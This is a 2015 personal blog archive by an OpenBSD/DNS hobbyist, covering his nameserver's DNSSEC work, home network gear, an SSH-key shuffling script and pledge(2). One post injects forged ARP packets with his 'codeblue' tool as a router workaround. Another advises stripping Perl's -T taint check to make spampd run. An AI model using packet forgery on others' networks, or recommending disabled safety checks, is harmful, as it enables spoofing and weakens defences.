I bought Design and Implementation of the FreeBSD Operating System, by McKusick et al. Second edition! Having looked through this book I can tell it'll be insightful. I bought the Design and Implementation of the 4.4BSD Operating System from the same author around 1996. I had struggled with it, it's not an easy read and they recommend a Tanenbaum for newbies first. Which I did (buy a Tanenbaum), and it was worth it. Now I only hope there are some similarities left between FreeBSD and OpenBSD like mbuf's. :-) Can't port something without understanding both systems anyhow. So.. that only leaves someone to write Design and Implementation of the OpenBSD System, hint hint. Anyhow I think this McKusick book will be great.



Spampd and taking the -T out

August 9th, 2015

I must have wasted 2 hours trying to get spampd to work on a FreeBSD jail with most recent ports. This was the error message:

Aug 09 11:15:51 testmail spampd[86796]: 2015/08/09-11:15:51 Insecure dependency 
in open while running with -T switch at /usr/local/lib/perl5/site_perl/Net/ \
Server/Daemonize.pm line 75.    at line 179 in file /usr/local/lib/perl5/ \
site_perl/Net/Server.pm 

I tried everything, permissions, and ownership changes and all would work. So finally I figured out that -T belongs to perl and not spampd or spamassassin. When taking it out in /usr/local/sbin/spampd in the first line it worked. I don't know enough of the implications of this but I'm sick of wasting a Sunday afternoon on a stupid -T. It stays off.

root@testmail:/usr/local/etc/rc.d # perl --version

This is perl 5, version 20, subversion 2 (v5.20.2) built for amd64-freebsd-thread-multi

Copyright 1987-2015, Larry Wall



I started shuffling my $HOME/.ssh directory

August 10th, 2015

There have been reports (real reports) of firefox allowing a remote attacker to read ssh keys. To make it harder on the attacker I'm shuffling my .ssh directory with this script:

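#!/bin/sh

# Rename the directory that holds the ssh keys to a fresh random name and
# regenerate ~/.ssh/config so that it points at the new location.

# the find below uses a relative path, so start from the home directory
cd /home/pjp || exit 1

# mktemp -u only prints an unused name, it does not create anything
TMPDIR=`mktemp -u /home/pjp/.ssh-XXXXXXXXX`
BASE=`basename "$TMPDIR"`
# the key directory is recognised by a marker file called "sshlocation"
SSHLOCATIONX=`find .ssh* -name sshlocation -print`
[ -n "$SSHLOCATIONX" ] || exit 1
SSHLOCATION=`dirname "$SSHLOCATIONX"`

mv "/home/pjp/${SSHLOCATION}" "$TMPDIR"

# fill the new directory name into the placeholder of the template
sed -e "s/@XXXXXXXXXX@/${BASE}/g" \
/home/pjp/.ssh/config.template > /home/pjp/.ssh/config

exit 0

An IdentityFile entry in my config file points to the right id_rsa file. Which btw is passphrased, thank god! It would be folly I believe to have no passphrase on my ssh keys. Don't be lazy!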

I shuffle every 5 minutes per crontab.



Still in a Consumer Rush

August 16th, 2015

I'm still in a consumer rush. I hope it quells soon. I just purchased another quad gigabit ethernet card for my soekris router. This brings the gigabit ports on the soekris to twelve. I'm also very interested in the raspberry pi for some reason again. Not so much the rpi that I have but the rpi 2 which has double the RAM and 4 cores. If I were to put together the soekris and 10 RPI boards I'd have a small supercomputer. I'm currently testing the possibility of this. I'm brainstorming uses too.



And still in the Rush...

August 17th, 2015

I couldn't resist looking at raspberry pi stuff and came across a battery pack unit. I thought this was good for a portable CryptoPi made the same way as a CryptoBook, only cheaper. If it works out I'll be able to exchange it with my Uncle who by now is in possession of the silver cryptobook.



OpenBSD 5.8 Pre-orders are on

August 19th, 2015

I have preordered my copy of OpenBSD 5.8 which will be released on October 18 which deraadt says is the anniversary of a Makefile he first committed in the OpenBSD tree. It's the OS's 20th anniversary. If you're interested in obtaining OpenBSD on CDROM go to https://openbsdstore.com and look for OpenBSD version 5.8. Be sure to click on the EU symbol if you want to pay in euros. With my preorder I also ordered a poster this time. It should look good in my apartment.



Maxed my Soekris 6501

August 21st, 2015

I have maxed the soekris net 6501 I have with 12 interfaces. 5 are used and 5 are possibly going to be used in the near future.

It took 3 years or so to assemble all this, finally it's completed. The latch to make sure the cards don't move did not fit in and I couldn't screw it on, too bad.. a slight misdesign by soekris. One just has to be careful with this one when transporting it.



Changes at work

August 22nd, 2015

The company I work for has been sold. Or better yet it has been acquired by another company. I worked there for 6 hours a day since 2012 and in total 5 years. Finally I told on my resume where I work. We were a very small company so I always felt it was better to keep secret where I work. Now it's in the open.

The company that acquired us wants to retain everyone on staff. I've been offered an "after hours support" position at the NOC at that company. They promise more money, which is nice but I'm gonna have to work extra hard to establish a trusting relationship. It scares me somewhat because trust establishment is not like respect. Respect you can earn, but trust is a two way street, and it's subtle.

Since I am a remote worker everything hits me especially hard, since I'm not in the office. It's a stressful time for me and I hope I'll be able to get over it soon. Right now at work we're in a transition, from our system to the other system. The company that acquired my work sits in the USA, this is almost a repeat of what I saw in 1999 when another US company took over the Canadian ISP I worked for. Americans have a liking for buying Canadian companies. :-)

Back in 1999 I quit the company, but I watched the other people who didn't and they had a fairly solid job for a few years at least. Instead of panicking I'm gonna take it in stride this time, perhaps something positive will evolve out of this. Whether it's gonna work is written in the stars perhaps. But I'm gonna have to say goodbye to the Canadian systems we've built and nurtured. I won't be that "Canadian ghost" that works in the real early hours of the morning. Now I'm in new territory, it's a little scary, as it's unfamiliar to me.

I'm always glad I have a blog to get things off my chest. To whomever reads this.



Bought a Reggae Album

August 24th, 2015

This time it's Konshens - Mental Maintenance. The first few songs sounded great!



Ordered two books from Amazon

August 25th, 2015

I have ordered:

  • The definitive guide to HTML5 Websocket - Vanessa Wang
  • HTML5 und CSS3: Das umfassende Handbuch - Jürgen Wolf

I plan on using these books to make a remote serial console for a bhyve guest. Dunno if it'll work or not.



Omega: a new VPS

August 26th, 2015

I got a new VPS based in Frankfurt, Germany. It's called omega.virgostar.net. I'm going to be using this one for a testbed with DNSSEC. With that I'm going to have to split my domains a little bit. io.solarscale.de and supercluster.virgostar.net will become a pair for serving my current domains. Then I'm going to take my test domain (swshell.de) and transfer it to a new pair consisting of omega.virgostar.net and americas.centroid.eu. In this constellation I'm going to test DNSSEC, until either the test is done or americas.centroid.eu expires. I'm not going to renew it, meaning in May 2016 I'll have three VPS again instead of four. This is positive as four VPS's is starting to become a bit much to manage.



Resisting Refugees is Shameful

August 27th, 2015

If you are against the refugee situation in Germany and greater Europe look into your heart. There are people fleeing a civil war and poverty, disease and of course violence of the highest degree. I'm for taking in refugees and I support it with money as well (200 euros went to the Red Cross this year for support of refugees). I don't believe anti-refugee violence should be tolerated here. And I just can't believe that there are people so ignorant of the refugees who are in dire need of help. They say haters are gonna hate, but it's a shame that haters become physical threats. Shame on those hateful people who stand in refugees' way. That's all I wanted to say.



Cancelling io.solarscale.de, eventually

August 29th, 2015

io.solarscale.de wasn't meant to be around forever. I've had it a number of years now at hetzner online. So hetzner came out with a new line of VPS's. A certain config of it I don't like at all, so when I tried getting a new VPS with them I got stuck with that, I cancelled it right away. No way! So I'm in the process of migrating everything to omega.virgostar.net and supercluster.virgostar.net (the former for mail, the latter for web). I just set up the IPSEC tunnel between those two hosts, it's looking promising.



Changed DNS setup

August 31st, 2015

I have partitioned my zones between four nameservers (two sets). swshell.de is a testdomain and is served by io.solarscale.de and americas.centroid.eu. I will test dnssec on these eventually. The rest of my domains are served by omega.virgostar.net and supercluster.virgostar.net. This is a thinning out and I hope I don't experience a double failure on either set but then nothing would work anyhow anymore.



The last homely house on Earth

September 5th, 2015

Or... next stop, the Moon. This photo is my favourite photo of 2015.

I prefer it cold in photos as you could probably tell if you saw my self portraits on this website. No, I'm not in this photo.



Delphinusdnsd now answers to version queries

September 5th, 2015

On my test server it replies for version queries now:

alpha$ dig @io.solarscale.de version.bind ch txt +short
"http://delphinusdns.centroid.eu"
alpha$ dig @io.solarscale.de version.bind ch txt +short +tcp
"http://delphinusdns.centroid.eu"

I did this partially because I needed something easy to do. Where I left off in June/early July was boring and complex work. I am trying to get back into the swing of things now. There is lots to do still before the 1.0.0 release. If I don't make it by November 15th, it will be postponed until the new year in 2016 most likely.



Equinox in less than 2 Weeks

September 10th, 2015

On September 23 at 8:20 GMT is equinox. After that point the nights will become longer again and the days shorter. Yes, winter is inevitable. That day is also the start of Autumn (or Fall) and usually the leaves from the trees will turn in colours and eventually fall to the ground. Frost will return...then perhaps snow putting its blanket on the leaves that fell. Insects will rest, other wildlife will have a harder time getting food. These are the seasons of the northern hemisphere. I think it's great!



Purchased Reggae

September 10th, 2015

This time it's Exco Levi - Country Man. He's a migrant to Canada like me!



Ordered a book from Amazon

September 10th, 2015

I ordered the "Computer Security Handbook" by Seymour Bosworth et al. It cost a lot of money, but it's a thick book (2000+ pages). I was made aware of this book when I googled the domain of my place of work and it came up. Apparently a link in the book is to our servers, which interests me. Oh well here is hoping to it being good.



I'm not hiring

September 15th, 2015

People are sending me resumes, from what I can tell from the envelope. I'm not opening resumes as I'm not hiring. I look at these as attempts at phishing. Thanks. Also I'd like to say that I'd love to be hiring, had I money. Sad truth is that I'm not rich.



Happy September Equinox!

September 23rd, 2015

As I write this there is about 30 minutes until it's truly equinox. Happy Equinox! I turned the heat to 1 (out of a possible 3 settings) today as it was quite chilly overnight. This morning I looked up the temperature at 10 degrees Celsius. Since these are night heating units it'll take 1 or 2 days for them to reach their heating potential.



European Union where is your strength?

September 26th, 2015

The fact that all of Syria only represents ~4 percent of all EU citizens makes it a sad chapter in Europe as a whole that we can't "grow" 4%. And not only that there is talk of 800,000 refugees this year which is 0.16% of the European population. And even then if you were to take all 60 million refugees worldwide that's only 12% of the EU citizen base. I just can't believe that some Central European nations within the EU don't want to take their fair share of refugees. Where is our conscience?

Why are Europeans so xenophobic when it comes to our neighbours? Let me spell it out for you: 2000 years ago Syria was part of the Roman Byzantine Empire and is a Mediterranean nation. This means it is on the same Mediterranean as Italy and Spain. Have you not realised by now that the ground you're on in Europe is not yours? You're only a steward of managing this ground as is everyone else, we all die, so then that stewardship is dissolved. The land belongs to no one, the people and their visions are the stewards of the land, and a slight discrepancy in numbers (4%!) doesn't affect the main core! What's happening now is disgusting, greed, opportunism, xenophobia, and racism are the signs coming out of Europe.

We should be above all those things, our waters are clean to drink giving us health. The land is fruitful giving us food to eat. Why can't we share that with people who have lost it all? And mind you the uprisings in the fringe nations of the EU are an indirect cause of our unity. We should feel compelled to help them not close them out.



Profit for the poor!

September 27th, 2015

I have saved a lump sum of money over several years. It's more than a little and too little to gain any attention. However I want to invest it into a business of Internet nature. I would do work just before and during this endeavour to make it work. The big problem that I see is that I don't have enough capital to start to make it, and I want to do it on my own. I realise that "The Internet" the medium that promised freedoms to us is only a place where the rich can make a profit. And that's what's wrong with it. It is _the_ motor that makes the rich richer and the poor poorer because poor are just supposed to give money to the rich on the Internet and no opportunity for small business is granted. Correct me if I'm wrong.



Wrote a donation to OpenBSD

September 30th, 2015

Yes it's donation time again. I have written the transaction and will be bringing it to the bank Friday the 9th of October or thereabouts. It's only 50 euros so nothing much to get excited about. But every tidbit helps. This brings the total donations this year to 200 euros, I think.



Pre-ordered Tears of Luv Album

October 1st, 2015

The artist: Anthony B
The album: Tears of Luv
The release date: October 16th



Happy Birthday M.

October 2nd, 2015

I know you probably won't read this but here is a try anyhow. May the walks of life guide you back to us.



For God's sake! Stoererhaftung is in the Way!

October 3rd, 2015

In Germany there is a law preventing people from opening their access point to anyone in the public. It's called the Stoererhaftung (in German) which translates to the two words "Stoer" which means disrupt and "haftung" which means accountability.

We have a situation now that is of national significance. We have a lot of refugees that are flooding first contact centers. The refugees are in dire need of Internet to keep touch with their families. After food, clothing, shelter and security Internet is the next needed thing for them.

The German government has denied Internet access to refugees for a period up to two years, which is the word from someone I got to know through a mailing list. She works with the refugees. People and groups are helping provide Internet by using the Freifunk infrastructure which bypasses the legal situation with the Stoererhaftung. It's not ideal because the resources of Freifunk groups are limited.

While Freifunk is happy now that we're seeing real user numbers on our stats, I worry about the long term effects half a year down the line. We need to offload. And the only correct way is to offload the Stoererhaftung. We fought the government on this before, and to put it bluntly the government is the reason that we're dumped on with refugees looking for Internet.

Getting rid of the Stoererhaftung would allow us to make operations cheaper as traffic would come from inside Germany, it would make everything sustainable. This is a classic case where a law designed by government is causing people in need to suffer.

I expect the German government to immediately do everything in their powers to help the humanitarian crisis that our refugees are facing. Look no further than the Stoererhaftung, it's a law that is disruptive in all respects.



Happy Birthday R.

October 3rd, 2015

And everyone who is born on this day, happy birthday!



Autumn Programmer

October 7th, 2015

I took this picture yesterday I thought I'd share it.

Today the leaves on the maple are even more brilliant and red. It's a nice sight. Soon they'll fall I'm sure.



OpenBSD 5.8 poster arrived

October 7th, 2015

This means the CD is on its way as well. I now have posters of a lot of researchers when you look at the OpenBSD poster and the poster beside it of the over-wintering expedition of Concordia station in Antarctica.

Yes my office is colourful, if you look close you'll see some fud on the planets poster above the monitor but I don't think you can see that in detail.



Status update on Delphinusdnsd

October 10th, 2015

This morning I finished 4 needed DNSSEC RR's for ANY replies. Since the code for ANY and AXFR is in parts the same this finished AXFR's as well. I'm now about a month away from release and I don't think I'll make it. I have a one week vacation before the month changes to November and I need to write the frontend ruby code to dns sign the delphinusdnsd zones. If I get finished it will be untested for release and if I test it it may take until new years to release. I'll keep hacking on it (I have Monday off), and I'm refreshing myself with ruby right now on this weekend (got the ruby book beside me).



Yesterday OpenBSD 5.8 arrived

October 11th, 2015

I got the 3 magic discs of freedom! Thanks to all involved!



Upgraded supercluster

October 17th, 2015

Along with every other host on my network I have upgraded supercluster. If you see any breakage let me know. I'll fix it.



Luna-27

October 19th, 2015

I'm thrilled that Europe wants to put personnel on the moon.



Oct 21, 2015 Cars that fly?

October 20th, 2015

Tomorrow is back to the future day. On this day in part 2 of the trilogy Marty McFly travels to Oct 21, 2015, in essence tomorrow. Cars that fly? More like cars that lie, if you look at the VW emissions scandal. We did not get the hologram projectors nor the hoverboards. But we had something in common, cars still exist in 2015.

Thanks to Chris who gave me a ride in his deLorean one day when I was in grade 10 or 11. That really rocked! Did we timetravel?



MPS open sourced

October 22nd, 2015

Almost two years after I wrote this with help of Rienzilla I'm releasing it to the public. The sources are found here, enjoy.



Open Sourced CodeBlue version 1

October 24th, 2015

After 14 years of having this program (mostly) for myself, I think it's worth it to Open Source it. Successes of Code Blue are

  • proving a bug in someone's program
  • proving a bug in the OpenBSD kernel which caused a crash after a CBv1 typo
  • proving that ARP packets get lost on AVM routers (recently)

There were many other cases that I used codeblue for good. It's not an evil program. Sources are here. Codeblue was based on gppf in idea but not in code.



AVM FritzBox Router losing ARP packets

October 26th, 2015

After a 2 month long debug session with my gear I finally produced a workaround with codeblue to _fix_ the situation.

The problem: between my routers gamma and uranus (both OpenBSD) arp gets lost either on the FritzBox or a FritzRepeater from the same manufacturer (AVM).

The solution: check if a threshold of arp cache timeout has been reached and populate the arpcache manually with an injected arp packet.

Here are the scripts I've written. On uranus:

#!/bin/sh

# this script checks if ARP was lost between gamma and uranus via AVM AP
# if so it will mail me and send a gratuitous arp to restore the arp cache
# on gamma it will do it twice to escape stupid filtering on AVM fritzbox.

sleep 10

# minutes left in the Expire column of gamma's arp entry for uranus
CACHE=`ssh watcharp@192.168.179.1 /usr/sbin/arp -na |\
 awk '$1 == "192.168.179.10" { a = split($4, b, "m"); print b[1];}'`

# no entry at all, or less than a minute left (e.g. "58s"): count it as 0
case "$CACHE" in
''|*[!0-9]*) CACHE=0 ;;
esac

if [ "$CACHE" -lt 15 ]; then
        echo "cache is at $CACHE going to set arp manually" | \
        mail -s "arp timeout" emailat@centroid.eu

        /usr/local/bin/cb  -a is-at -s192.168.179.10 -d192.168.179.1

        sleep 20

        /usr/local/bin/cb  -a is-at -s192.168.179.10 -d192.168.179.1

fi

exit 0

And then on gamma:

#!/bin/sh

# broadcast an ARP who-has for 192.168.179.10 from gamma (192.168.179.1)
/usr/local/bin/cb -l re1 -a who-has -s00:0d:b9:XX:XX:XX,192.168.179.1 \
	-dff:ff:ff:ff:ff:ff,192.168.179.10

With these scripts I am willing to bet my problems go away.



Outlook Delphinusdnsd 1.0.0 not before XMAS

October 27th, 2015

I'm getting stalled with development of delphinusdnsd and distracted. I should have been coding on this yesterday to make use of my full vacation for this but I decided to soak up laziness instead. It's ok though, there is no way I can do this in two weeks, if I do then there would be little testing if any.



pledge(2) Don't do this!

October 31st, 2015

pledge(2) in OpenBSD is a whitelist of system calls that a programmer pledges / promises his program will conform to. If they lie the kernel will kill the program. If you look at this from an attacker perspective you'll have to restrict bytecode or whatever your edge is to the pledged spectrum of syscalls.

I'll give you another example. If you have an anti-virus mechanism that scans emails or programs it may not need to talk Internet protocols and thus if someone manages to buffer overflow the scan process and have it open a socket back to the attacker aka a bindshell, pledge will stop the socket call before the kernel opens it. It's ingenious and it gets better. As you know your program you can pledge several times to restrict more and more of it over the course of the program flow.
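
The staged narrowing described above, as an added example in C (not OpenBSD's or the author's code): a hypothetical mail scanner that pledges "stdio rpath" to open its input and then drops to "stdio" before it touches untrusted bytes. The scanner, its function names and the marker string are constructed; on systems other than OpenBSD a stand-in pledge() that enforces nothing is compiled in so the code still builds.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#ifndef __OpenBSD__
/* Assumption for portability: a stand-in that enforces nothing, so the
 * example compiles and runs on systems without pledge(2). */
static int pledge(const char *promises, const char *execpromises)
{
	(void)promises;
	(void)execpromises;
	return 0;
}
#endif

/* Constructed marker, not a real malware signature. */
#define SIGNATURE "X-DEMO-MALWARE-MARKER"

/* Count occurrences of SIGNATURE in an untrusted buffer. */
size_t scan_buffer(const unsigned char *buf, size_t len)
{
	size_t siglen = strlen(SIGNATURE), hits = 0;

	for (size_t i = 0; siglen <= len && i <= len - siglen; i++)
		if (memcmp(buf + i, SIGNATURE, siglen) == 0)
			hits++;
	return hits;
}

/*
 * Stage 1: "stdio rpath" still allows opening files read-only.
 * Stage 2: "stdio" only; a later pledge can remove promises, never add.
 * Returns 0 and stores the hit count, or -1 on error.
 */
int scan_file(const char *path, size_t *hits)
{
	static unsigned char buf[65536];	/* demo reads at most 64 KiB */
	FILE *fp;
	size_t n;

	if (pledge("stdio rpath", NULL) == -1)
		return -1;
	if ((fp = fopen(path, "rb")) == NULL)
		return -1;

	/* The file is open, so rpath is no longer needed. */
	if (pledge("stdio", NULL) == -1) {
		fclose(fp);
		return -1;
	}

	/*
	 * From here on a socket(2), open(2) or execve(2) reached through a
	 * parser bug gets the process killed by the kernel; no "inet"
	 * promise was ever made, so there is no connection back out.
	 */
	n = fread(buf, 1, sizeof(buf), fp);
	fclose(fp);
	*hits = scan_buffer(buf, n);
	return 0;
}

int main(int argc, char *argv[])
{
	size_t hits;

	if (argc != 2 || scan_file(argv[1], &hits) == -1) {
		fprintf(stderr, "usage: scan file\n");
		return 1;
	}
	printf("%zu hit(s)\n", hits);
	return 0;
}
```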

In private conversation I offered Theo de Raadt, the principal programmer around pledge, an awk program that rudimentarily scans C sources to determine a base pledge in a program. What I got back was a response I didn't expect. So I'm giving out a warning to people to NOT DO AS I had done. I still think I'm not going to be the only one who writes such a program since my gift to deraadt was not done publicly.

You see in computer science you study the code, then you UNDERSTAND the code and then you can add to it. What I did was pseudo-science, since I didn't need to understand the code. Understanding is a big problem with code in general as everyone has their own style within the allowed programming idioms of C. Not understanding code means you can't contribute to it. I personally did not understand BIND code so I decided to write my own nameserver, the result was something I understood because I wrote it without wasting my time going into libraries that criss-crossed all over the source tree. However my code grew past 10,000 lines and it's easy to lose track of some areas.

My memory is not the best, I think it's short span, so I try to work with tools that ease this. However let's get back to science. As shown by the commits of top, the programmers who pledged it not only screwed up once but twice and failed to understand top. So now we're accusing each other of pseudo-science and not understanding the code right. Let's put that away, as it's counter-productive. However I'd like to warn people of suggesting to OpenBSD what I had done. So know your code, apply pledge and stay safe.

For me pledge doesn't work as shm*(4) routines don't have a pledge keyword, so I'll have to wait. Anyone else wanting to pledge a program linked against db4 will have to do the same.

And lastly I'll say I was a bit hurt by deraadt's words, but I'm not gonna repeat them in public. I'll still stay loyal to OpenBSD despite this.



Donated to OpenBSDFoundation

November 4th, 2015

I have given the OpenBSD foundation 41.81 EUR which was in my paypal account. I usually donate directly to deraadt but I wanted to rid the money I had in my paypal account so it goes to the foundation this time.



swshell.de is DNSSEC enabled now

November 8th, 2015

Since yesterday swshell.de is DNSSEC enabled. I finished the zone signing utility for delphinusdnsd which is called dd-convert.rb. That utility leans on BIND tools. One day perhaps I'll make my own. I have checked with the DNSSEC debugger and everything seems to be in the green, but I have to figure out what I did first to do so and play a little with tools. Also delphinusdnsd would need a good debugging now so that it gives quality answers.



Happy Anniversary Delphinusdnsd!

November 8th, 2015

Even though I checked in the sources on November 29th, 2005 I must have been writing on Delphinusdnsd before that, so November is anniversary month! Guess what, this daemon of mine is 10 years old! It does DNSSEC now too! So in my experience it takes a part-timer 10 man-years to reach DNSSEC. And I had a lot of spare time when I wasn't programming on this server. I have received lots of support mainly out of eastern Europe for this server. I don't quite know why that is, but thanks to you for using my server, and for inquiring about it and a big thanks to those that sent patches. Thanks also goes to #unixhelp for hearing my worries, visions and dreams about this DNS server. Thanks for putting up with me! The first non-beta version of this server will likely be released around new years 2016. I'm just doing tests right now with swshell.de comparing it to BIND and keeping an eye out for faults. So what is next with this server? I plan on doing DANE support for it but then I think I'm gonna focus on bug fixing, dunno. There is always room for some newbie to come along to write on this. An easy task would be HINFO support. Cheers!



Delphinusdnsd does TLSA RR and thus DANE

November 10th, 2015

I hammered the support out this morning within 1.5 hours, probably a record for me. But I based it off SSHFP RR's support which has only 1 8 bit integer less in the answer, so it was fairly easy to convert.

I have asked Luke Antins if I can pay him a bit more for the TLSA support in his dns-zone ruby gem. If he is willing to do it, I'll be able to play with DANE as I haven't been able to sign the TLSA yet and thus that part is not tested yet.

These are interesting days for sure.



Purchased Reggae

November 13th, 2015

Yesterday I purchased the Faithful Riddim of various artists. I liked the "topic of the day" song by I Octane on youtube which made me get this. Also got "Trod on" by Devano single. Too bad Devano hasn't got an album on iTunes.



DNSSEC web validation tools

November 13th, 2015

Here are some validation tools that I have found:



Keeper of the Isis Light

November 18th, 2015

I read this book in grade nine. Also the sequel to it "the guardian of isis". These have nothing to do with ISIS that we hear about in the news today. These books were very well written IMO and were good science fiction. Something to dream about.



10 years Delphinusdnsd in 9 days

November 20th, 2015

It's here in 9 days. The anniversary when I can prove when I checked in the sources to the then-called wildcarddnsd. 10 years! And my server is like an arrogant little child still! Nothing like bind which is probably 17 years old now.



10 Years

November 29th, 2015

Today is the 10 year anniversary of delphinusdnsd. DNS to me has always been appealing, from vanity domain names on IRC to managing DNS as a hostmaster (system administrator). I wanted a deep understanding of DNS further than just being a hostmaster so I decided to keep working on this. At first it was just a stupid little turnkey program, but I got to like it so much that I continued to put my efforts into it. I'm doing DNSSEC with it now. That's a major feature. I plan to release the first major release in January 2016 which drifts off the New Year's date. Oh well, cheers!



23 days until the December Solstice

November 29th, 2015

It's 23 more days until we enter winter in the northern hemisphere. The southern hemisphere enters summer, so it is properly called the "December" solstice and not winter solstice. There are probably other names but I'm going to stick to December solstice. Its date is December 22, 2015.



What happens when...

December 1st, 2015

I tried to make two zones on two DNSSEC enabled nameservers. One being io.solarscale.de which is delphinusdnsd and the other americas.centroid.eu, which is BIND. I was interested how the servers would behave with one signed zone and one unsigned zone. And the result was staggering. There was almost no difference between the BIND and the delphinusdnsd. Both however reply with the DO bit set on the unsigned zone, which is possibly wrong. The signed zone is swshell.de and the unsigned zone is black.solarscale.de. Well it was worth the experiment and my code was forgiving.



Anonymity

December 3rd, 2015

In this article from heise online (German), politicians cry out about anonymity. In this case they're right IMO. However I see the problem differently. Right now the "end-user" is given a dynamic IP address which is to "guarantee" them their anonymity. Yet the provider knows who they are, and Google as well as other large networks who can correlate big data or logins to match someone. Also an end-user today must use IMAP or POP3 or webmail to a server on the internet to fetch their mail. Pretend it were different. Pretend everyone was given a static IP. Everyone now theoretically knows who this person is. Google would not care because they already knew anyhow, but you may see its market share go down because they don't guard a secret anymore. Also people would be able to get their mail via SMTP instead of IMAP/POP3 meaning mail is not stored on a 3rd party server. This is positive. A person with a static IP can run any services they like and become a server in this sense. This means that someone can have friends using their computer too, but if any of those friends betray the trust and invite a police visit, the friendship may be endangered. Who has taken the blame for things their friends did? I for one did once. But that was the last time. If you're a known troll for something your friends did from your computer it'd be very hard to repair that reputation, but that's the idea behind fixing this anonymity. So let's all be open and have static IP's is my idea.



Trying to run letsencrypt beta

December 5th, 2015

Well I tried to get the free https certificate with letsencrypt tonight:

19      ./letsencrypt-auto certonly --manual --email letsencrypt99@centroid.eu \
--agree-tos -d centroid.eu
id.eu --agree-tos -d centroid.eu                                              <
Updating letsencrypt and virtual environment dependencies.......
Running with virtualenv: sudo /home/pjpxx/.local/share/letsencrypt/bin/letsencrypt\
 certonly --manual --email letsencrypt99@centroid.eu --agree-tos -d centroid.eu

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Ugh no! I will not run this as root. This utility will need a fix for that before I run this again. Too bad!



Thinking of getting a third Internet Link

December 7th, 2015

I'm thinking of getting this cable Internet thing in the New Year. The German Telekom is slow in rolling out their VDSL in town so I'm thinking of going with RegioNet which is the city's own Internet company. Thinking of 50 Mbit/s.



Reggae

December 11th, 2015

I purchased the album "Legacy - an acoustic tribute to Peter Tosh", which is performed mostly by his son, Andrew, I suspect. Because I don't have many Wailers songs this will be a good addition to my music collection. Reggae music is wide-spread in spectrum but this goes to the root. Happy listening.



100 million X speedup from classical computer

December 11th, 2015

Google and NASA recently were in the news regarding their shared Quantum computer. They said that certain operations yielded a speedup of 100 million times what a classical computer can do. To put this into perspective. With 1 billion dollars you could buy 100 of these D-Wave computers which cost 10 million a pop. And those 100 would then have a distributed speedup of 10 billion times that of 1 classical computer. All that it leaves to question is .. what algorithms are capable of being run at that speed? If it's Shor's algorithm I think we can kiss our crypto safety goodbye. An SSH or TLS session would then be decipherable as it is an RSA Hybrid.

What was the "black-budget" of the USA again?



An ejection from Atacama?

December 13th, 2015

In this article phys.org reports that the country Chile is planning a hydro power plant in the Atacama desert. While this is applaudable there are European interests in the region that may conflict with this. Several ESOC telescopes are situated there and exploit the fact that the Atacama desert is nearly cloudless. Would water in that desert create cloud? Only time will tell. We may have to look for a new place for the southern observatories, or move it all to the moon. If that's even possible in the near future.



More sky photos coming up

December 15th, 2015

I was talking with my Dad who is getting a new camera. So I'll inherit his old one. It was the one that I took sky photos of Mars on February 7th, 2010 of (seen here). It's 6 years later and this camera is probably 2 generations old by now but I won't use it all the time, only sometimes. I'm especially interested in getting more of Delphinus constellation with its stars Rotanev and Sualocin (both are backwards from Nicolaus Venator) who apparently had a liking for the constellation Delphinus as well. Oh well here's to hoping it works out.



Getting ready for delphinusdnsd release

December 19th, 2015

I'm now running some of the latest code in production for the next two weeks on my nameservers io.solarscale.de and omega.virgostar.net. If I'm satisfied I will release delphinusdnsd 1.0.0 by January 1st, 2016. It's been a long year and I was very very brave for attempting DNSSEC. There is room for improvement but a simple DNSSEC'ed zone can be served by delphinusdnsd. After that I'm probably gonna take a (small) break from DNS programming.



Happy Solstice

December 21st, 2015

Tomorrow is solstice in the very early morning hours, iirc. So when I wake up it'll be winter officially. Happy (december/northern) Solstice!



I joined Twitter

December 22nd, 2015

There are a lot of fake accounts out there pretending to be mine. But the official twitter account from me is now @delphinusdns_pt Peter J. Philipp. I'll be dropping news on delphinusdnsd here and do personal correspondence between old and new friends of mine.



Merry Christmas

December 23rd, 2015

I may not get the chance tomorrow to wish you a merry christmas so this is it. Merry Christmas!



2015 Year in Review

December 29th, 2015

December 23, 2015	Merry Christmas
December 22, 2015	I joined Twitter
December 21, 2015	Happy Solstice
December 19, 2015	Getting ready for delphinusdnsd release
December 15, 2015	More sky photos coming up
December 13, 2015	An ejection from Atacama?
December 11, 2015	100 million X speedup from classical computer
December 7, 2015	Thinking of getting a third Internet Link
December 5, 2015	Trying to run letsencrypt beta
December 3, 2015	Anonymity
December 1, 2015	What happens when...	
November 29, 2015	23 days until the December Solstice
November 29, 2015	10 Years
November 20, 2015	10 years Delphinusdnsd in 9 days
November 18, 2015	Keeper of the Isis Light
November 13, 2015	DNSSEC validation tools
November 10, 2015	Delphinusdnsd does TLSA RR and thus DANE
November 8, 2015	Happy Anniversary Delphinusdnsd!
November 8, 2015	swshell.de is DNSSEC enabled now
November 4, 2015	Donated to OpenBSDFoundation
October 31, 2015	pledge(2) Don't do this!
October 27, 2015	Outlook Delphinusdnsd 1.0.0 not before XMAS
October 26, 2015	AVM FritzBox Router losing ARP packets
October 24, 2015	Open Sourced CodeBlue version 1
October 22, 2015	MPS open sourced
October 20, 2015	Oct 21, 2015 Cars that fly?
October 19, 2015	Luna-27
October 17, 2015	Upgraded supercluster
October 11, 2015	Yesterday OpenBSD 5.8 arrived
October 10, 2015	Status update on Delphinusdnsd
October 7, 2015		OpenBSD 5.8 poster arrived
October 7, 2015		Autumn Programmer
October 3, 2015		Happy Birthday R.
October 3, 2015		For God's sake!  Stoererhaftung is in the Way!
October 2, 2015		Happy Birthday M.
September 30, 2015	Wrote a donation to OpenBSD
September 27, 2015	Profit for the poor!
September 26, 2015	European Union where is your strength?
September 23, 2015	Happy September Equinox!
September 15, 2015	I'm not hiring
September 10, 2015	Equinox in less than 2 Weeks
September 5, 2015 	Delphinusdnsd now answers to version queries
September 5, 2015	The last homely house on Earth
August 31, 2015		Changed DNS setup
August 29, 2015		Cancelling io.solarscale.de, eventually
August 27, 2015		Resisting Refugees is Shameful
August 26, 2015		Omega: a new VPS
August 22, 2015		Changes at work
August 21, 2015		Maxed my Soekris 6501
August 19, 2015		OpenBSD 5.8 Pre-orders are on
August 17, 2015		And still in the Rush
August 16, 2015		Still in a Consumer Rush
August 10, 2015		I started shuffling my $HOME/.ssh directory
August 9, 2015		Spampd and taking the -T out
August 9, 2015		Ordered a Book from Amazon
August 2, 2015		CryptoBooks virtualized
July 28, 2015		Delphinusdnsd status update
July 27, 2015		Opinion: Hacking Team are pigs
July 25, 2015		Two CryptoBooks side by side
July 24, 2015		New Network Plans
